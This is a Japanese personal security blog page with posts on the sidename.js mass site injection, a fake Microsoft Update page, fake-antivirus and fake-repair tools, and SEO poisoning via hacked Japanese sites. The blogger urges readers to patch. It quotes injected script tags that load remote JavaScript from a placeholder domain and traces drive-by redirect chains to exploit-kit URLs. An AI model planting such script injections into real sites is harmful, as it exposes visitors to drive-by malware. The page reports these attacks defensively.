ここから本文です
サイトの改ざん、コンピュータウイルス・セキュリティ、検索エンジンYahoo!/Googleらへん...☆彡

書庫ウイルス・セキュリティ

 Windowsパソコンをターゲットに有名ソフトの旧バージョンにある欠陥(脆弱性:ぜいじゃくせい)を悪用したウイルス攻撃が流行中! 古いバージョンを入れっぱなしだと強制的にウイルス感染地獄!
(1) 「Windows Update」(Microsoft Update)の”自動更新”を有効にする
(2) Adobe Readerを最新バージョンにする
  + [編集]メニュー→[環境設定]で[JavaScript]→[Acrobat JavaScriptを使用]のチェックを外す
(3) Adobe Flash Playerを最新バージョンにする
(4) Java(JRE)を最新バージョン版にする

 パソコンには、ウイルス対策ソフトを入れてください。「変なサイトには行ってない」「今まで感染したことがない」なんてな寝言は通用しません。どうしてもお金をかけたくないなら、ユーザーサポートがないですが無料ウイルス対策もどぞっ。

セキュリティソフトランキング ... 売れ筋人気製品
セキュリティソフト比較 ... 第三者評価機関、市場シェア
記事検索
検索

全37ページ

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]

[ 前のページ | 次のページ ]

sidename.jsインジェクション 大規模な正規サイト改ざん攻撃?

 セキュリティ会社Armorize Technologiesというところが、LizaMoon改ざんとは異なるタイプの大規模な正規サイトの改ざんについて報告してます。
Mass Meshing Injection: sidename.js ongoing (Armorize Malware Blog)
新たなインジェクション攻撃、すでに3万サイトが感染か (japan.internet.com)

 正規サイトに不正なJavaScriptタグが挿入され、飛び先となってるJavaScriptファイル(sidename.js)の置き場所もまたハッキングされた正規サイトとのこと。記事では、JavaScriptファイルが置かれてる正規サイトのURLアドレスリストものっていて、中にJPドメインな日本のサイトもいくつか含まれてますなぁ〜。

 実際に突撃アクセスしてみたところ、ブラウザ内部で↓のような感じで強制的に誘導されていきました。ウイルスの感染手段は、「Java」「Adobe Reader」「Microsoft系」の3系統の脆弱性を悪用するドライブバイ・ダウンロード攻撃です。脆弱性はすでに修正されてるので、ちゃんと「Java」(JRE)と「Adobe Reader」を最新版に更新して、「Windows Update」してれば何ら問題なしっ! ;)
http://(正規サイトX)/
 ↓
http://(正規サイトY)/sidename.js
 ↓
http://(攻撃サイト).ce.ms/showthread.php?t= 〜
 ↓
http://(攻撃サイト).ru/forumthrea.php?tp= 〜 (Exploit Kit)
http://(攻撃サイト).ru/d.php?f=16&e= 〜 (Malware)
 攻撃スタイルとして、去年から今もずっと沈黙してるGumblar.x(ガンブラー)とも違う雰囲気。

 もし仮に更新をさぼってるダメダメパソコンだと、こんなウイルスが強制的に発動し感染しちゃう恐れがあります。何するんだろねコレ・・・?

VirusTotal
www.virustotal.com/file-scan/report.html?id=fcf519c051704ce91812a1945d924d3fc2aa8c46ccde7088a7a173193b58042d-1308316024
Anubis
anubis.iseclab.org/?action=result&task_id=1f4f16c5ff7402914cd9ee5fca2e39ccf&format=html

 ↑は記事を書く数時間前に回収してきたもの、↓は記事を書きつつ回収してきたもの。 :)

VirusTotal
www.virustotal.com/file-scan/report.html?id=a7d1a1b4418f7ff15427c79a257c2463c1166eb3e6508843271aa4681e323053-1308315550
Anubis
anubis.iseclab.org/?action=result&task_id=158b764b444cc492429de04a704098a86&format=html


[追記...]
 挿入されるJavaScriptコードはこんな感じかい?
<script type="text/javascript" src="http://[DOMAIN]/adv.php"></script>
<script type="text/javascript" src="http://[DOMAIN]/cssminibar.js"></script>
<script type="text/javascript" src="http://[DOMAIN]/counter.js"></script>
<script type="text/javascript" src="http://[DOMAIN]/wpqonfig.php"></script> x
<script type="text/javascript" src="http://[DOMAIN]/wpcomplate.php"></script> x
<script type="text/javascript" src="http://[DOMAIN]/confdb.php"></script>
<script type="text/javascript" src="http://[DOMAIN]/facebook.php"></script>
<script type="text/javascript" src="http://[DOMAIN]/js.php"></script>
<script type="text/javascript" src="http://[DOMAIN]/jquery.js"></script>
<script type="text/javascript" src="http://[DOMAIN]/ajax.php"></script>
<script type="text/javascript" src="http://[DOMAIN]/java.php"></script>
<script type="text/javascript" src="http://[DOMAIN]/search.php"></script>

開くトラックバック(0)

Microsoft Updateの偽サイトで偽セキュリティソフトを配布中!

 セキュリティ企業Sophos(ソフォス)によると、インチキ偽セキュリティソフトを配布する偽ウイルススキャンのページにMicrosoft Updateを装ったタイプのものが見つかったそーな。
Fake anti-virus cloaks itself to appear to be Microsoft Update (Sophos Naked Security)

 調べてみると、Windows UpdateやらMicrosoft Updateの偽サイトをブラウザに表示し勘違いさせて、手動で実行ファイル(ウイルス)を起動してもらう手法ってのは過去にもあったよーで。 ;)
またも「Microsoft Update」に偽サイト、トロイの木馬を誘導 (ITmedia News)
Windows Updateの偽サイト出現、フィッシングの可能性 (ITPro)

 んで、その偽Microsoft Updateのサイトに出会ったのでスクリーンショットを公開。重大な更新として『Windows Malicious Software Removal Tool (Critical Update) - February 2011 (KB990831)』なるものを導入しろと言うてます。

  http://farm6.static.flickr.com/5239/5820736592_4a4e8ab246_z.jpg

 この画面になる直前には、ホンモノにも存在する緑色の進行バーがアニメーションする演出もちゃんと用意されとります。実際にはチェックしてないので、5秒ぐらいで終わっちゃうけど。

  http://farm6.static.flickr.com/5185/5820185179_0081169fc6.jpg

 そもそもWindows Vista/7環境だと、Windows UpdateはOSそのものに統合されちゃってるので普通は出会わない場面ですな。ただ、Windows XP環境だと、Internet ExplorerブラウザでMicrosoft Updateのページへアクセスしてもらう形なのでダマし効果はあるんでしょう。日本語ではなく英語表示、URLアドレスがマイクロソフトじゃない、と怪しいところはあるワケですが、ただでさえ全体的な雰囲気がマイクロソフトばりばりなデザインのなので、うっかりダマされちゃうん? :)

開くトラックバック(0)

Java、Flash Player、Adobe Reader、Windows Update ちゃんと更新してる?

 ここ最近、Java(JRE) と Flash Player のとても重要なセキュリティアップデートが行なわれてます。6月8日時点の最新バージョンは下のような感じでしょうかね。 ;)

Java Version 6 Update 26
Adobe Flash Player 10.3.181.23(Internet Explorer用), 10.3.181.22(Firefox/Opera用)
  [追記 ... 6月15日に 10.3.181.26 へセキュリティアップデートあり]
Adobe Reader 10.0.1
  [追記 ... 6月15日に 10.1 へセキュリティアップデートあり]
・ (Windows Update)

 これらは導入した覚えがなくても、パソコンを買った段階で最初からインストールされてる場合も多いです。仮に導入されてたら、早く最新版へ更新しとかないとウイルスに感染します。実際に更新をさぼってる人のパソコンが、知らないうちに勝手にインストールされるインチキ偽システム修復ツールの被害に巻き込まれてるようです。 :(

○ Windows XP Recovery
○ Windows 7 Recovery
○ Windows Vista Recovery

   http://farm3.static.flickr.com/2091/5802817088_f81bfe2e23.jpg

   http://farm6.static.flickr.com/5150/5802817084_2292d0879e.jpg

 何か先月5月あたりから感染騒動でスゴイみたいで、ハードディスクうんぬんエラーがあるとデタラメ警告を示して、”有償版”を買うよう脅迫してきます。

   http://farm6.static.flickr.com/5032/5802628069_bbe2b3bfbe.jpg

 被害にあった人の話で、具体的なウイルス対策ソフトの商品名を挙げ、導入してたのにすり抜けて殺られた〜!、と嘆いてるのを見かけましたが当たり前の話。ウイルス対策ソフトは、感染原因となった”更新さぼり”なんぞ知ったこっちゃなし。ちゃんと更新してあれば、ウイルス対策ソフトの出番以前に、そもそもこのインチキツールが強制感染する事態がほぼ100%起こりません。 :)

「アップデート」を実行しよう【プラグイン編】 (So-net セキュリティ通信)
ホームページからの感染対策 (サイバークリーンセンター)


[6月15日追記...]
 セキュリティアップデートが行われたのでバージョン情報に加筆。

https://s.yimg.jp/images/sicons/affiliate16.gif  私のおすすめ:
ハイ、私は更新をさぼっていて感染したおバカな人間です。

開くトラックバック(0)

偽セキュリティソフト「Security Shield」を進化させてみた

 最近はあんまり感染の話を聞かなくなったインチキ偽セキュリティソフト「Security Shield」を購入すると、先月あたりからパワーアップ版が導入される、というお話があったので試してみやした。

 まずは「Security Shield」を入手して感染します。買え買え〜ポップアップや激しい操作妨害が行なわれ、無視し続けてるとIEブラウザが起動して、海外の過激なポルノサイトを見せつけてきます。さっそく(ネット上で公開されてる)レジストコードをホイホイッと入力。 ;)

   http://farm3.static.flickr.com/2705/5786229666_05ac2a40d2.jpg

 するってーと、「Updating to Full version...」とな?

   http://farm3.static.flickr.com/2165/5786229670_26f877079e.jpg

 どーん! 「Security Shield」にとって代わって「Security Shield Pro 2011」なるものが新しくインストールされてしまいました。右上のロゴ以外は全体的な雰囲気がぜんぜん別モノです。こっちは妨害処理とかはなく、×ボタンでプログラム自体はちゃんと終了するなど非常におとなしい。さらに買え買え〜とはならないようで。

   http://farm3.static.flickr.com/2537/5786229672_80cda3dc2b.jpg

 「Security Shield Pro」のフォルダはこんな感じになっていて、SSP.exeが本体。サイズがでかい *.dat はいちおうウイルス定義データという名目なんでしょうが中身を見る限りゴミ。

    http://farm3.static.flickr.com/2188/5786229674_559f6637a1.jpg

 アンインストール用らしい「unins000.exe」が用意されてるので、ホントに削除してくれるのか試してみたところ、関連ファイル群はキレイに削除されましたが、レジストリにゴミは残していきました。パソコン起動時に「Security Shield Pro」を起動させる設定ですな。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
SSP (C:\Users\ユーザー名\AppData\Local\Security Shield Pro\SSP.exe)

開くトラックバック(0)

SEOポイズニング攻撃 日本の踏み台サイトたち 【Windows&Mac⇒ウイルス】

 検索エンジンを悪用したSEOポイズニングが流行ってるということで、この「Mal/SEORed」なる検知名で検出される踏み台ページが大量に構築されてしまってる日本国内サイトの実例をテキトーに。こんな感じでハッキング状態の正規サイトは世界中にウン万サイトと存在してるんでしょうな〜。 :(
検索悪用の「SEOポイズニング」によるマルウェアは30%超に (ITMedia)

 東京の会社が運営してるゴルフ系サイト内に構築されてる踏み台ページ。ユーザーを誘き寄せるためのイメージ画像が約2,000件ほど登録されてしまってます。ドレス、銃を持ったおっさん、子供をあやす(?)トラ、アパート、赤ちゃん・・・。
     http://farm4.static.flickr.com/3320/5767163800_4a805c65ca_z.jpg

 東京の音楽制作会社のサイト内に構築されてる踏み台ページ。ユーザーを誘き寄せるためのイメージ画像が約20,000件ほど登録されてしまってます。パーティ、男性や女性の人の顔、広大そうな畑の風景・・・。
     http://farm4.static.flickr.com/3289/5767163804_e4ccac04cc_z.jpg

 どちらも”安全”と判定されてる怪しくも何ともない正規サイトなので、セキュリティソフトの危険サイトブロック機能が必ずしも役に立ってくれず。

検索エンジン
 ↓ 画像をクリック
ハッキング被害を受けてる正規サイト(踏み台)
 ↓ 強制誘導先をブラウザのユーザーエージェントから振り分け
攻撃ページ
 で、画像をクリックすると・・・

Windowsの場合
 ドライブバイダウンロード攻撃が行われます。Java(JRE)Adobe ReaderMicrosoft系(Internet Explorer、Microsoft Office、Windows OS)の脆弱性を悪用して、ユーザーが知らないうちにウイルスを強制的に起動させる処理が裏で行われます。悪用される脆弱性は最新版ですでに修正済みなので、ユーザーが更新作業をちゃんと行っていれば被害は回避されます。

Macの場合
 JavaScriptで組まれた偽ウイルススキャンの画面が表示されMacユーザーを驚かせます。Safariブラウザの設定の影響で、この表示といっしょにウイルスのアーカイブファイルが確認もなく勝手にダウンロードされます。インストールしなけりゃいいんですが、人によってはパニック状態で冷静な判断できなくなてってるやもしれません。

開くトラックバック(0)

全37ページ

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]

[ 前のページ | 次のページ ]

Yahoo!ブログからのお知らせ

noooo_spam
noooo_spam
非公開 / 非公開
人気度
Yahoo!ブログヘルプ - ブログ人気度について
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
検索 検索
友だち(5)
  • who
  • ★ピサロ★
  • Kerupani129
  • 物知りマン
  • Cookies
友だち一覧

よしもとブログランキング

もっと見る
本文はここまでですこのページの先頭へ

[PR]お得情報

ふるさと納税サイト『さとふる』
11/30まで5周年記念キャンペーン中!
Amazonギフト券1000円分当たる!
ふるさと納税サイト『さとふる』
お米、お肉などの好きなお礼品を選べる
毎日人気ランキング更新中!
数量限定!イオンおまとめ企画
「無料お試しクーポン」か
「値引きクーポン」が必ず当たる!

その他のキャンペーン

みんなの更新記事
前へ 次へ